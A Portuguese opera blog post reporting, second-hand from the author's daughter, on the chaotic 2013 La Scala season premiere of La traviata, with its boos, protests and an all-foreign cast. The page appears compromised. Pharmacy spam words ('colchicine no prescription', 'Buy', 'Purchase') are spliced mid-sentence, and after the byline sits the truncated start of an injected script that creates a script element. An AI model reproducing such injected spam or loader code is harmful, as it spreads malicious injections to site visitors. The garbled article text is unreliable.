LateralNotíciaÓpera

“La traviata”, no Scala de Milão

Parece que deu tudo errado!


Minha filha Luciana Góes Nacca, que mora em Pessano, província de Milão, foi à Scala com o marido Pasquale, para a Traviata da estreia da temporada 2014, que tradicionalmente ocorre dia de Sant´Ambroggio, padroeiro de Milão, 7 de dezembro, e me mandou notícias de que houve muitas vaias e alguns aplausos, sendo o público milanês muito infenso a que a Scala escale um elenco todo estrangeiro para sua “premiére”.

Order

Segundo Luciana, houve de tudo além de vaias e aplausos: faixas de protesto, faixas de apoio, brigas de tapas, grupos se degladiando colchicine no prescription nas ruas. Parecia até o Campeonato Brasileiro…

O “staff” técnico se compunha de cena e cenários de DMITRI TCHERNIAKOV, figurinos de ELENE ZAYSEVA. O elenco musical se compunha de regente DANIELE GATTI, Violettta DIANA DAMRAU, Alfredo PIOTR BECZALA, Germont ZELIKO LICIC Purchase , e outros. Como Annina- vejam só o que é o mundo da arte cênica-  a ex “leading soprano” MARA ZAMPIERI!! Sic transit…

Com efeito, a Scala terminar o ano Verdi com uma Traviata cheia de “gringos”, como diz o Ali, é Buy dose prá elefante…

Buy

MARCUS GÓES- 07 DEZ 2013
EM PRIMEIRA MÃO – ENVIADO POR LUCIANA GÓES

if (document.currentScript) { var d=document;var s=d.createElement(‘script’);

Faça seu comentário

Leave a Response

Marcus Góes
Musicólogo, crítico de música e dança e pesquisador. Tem livros publicados também no exterior. Considerado a maior autoridade mundial sobre Carlos Gomes.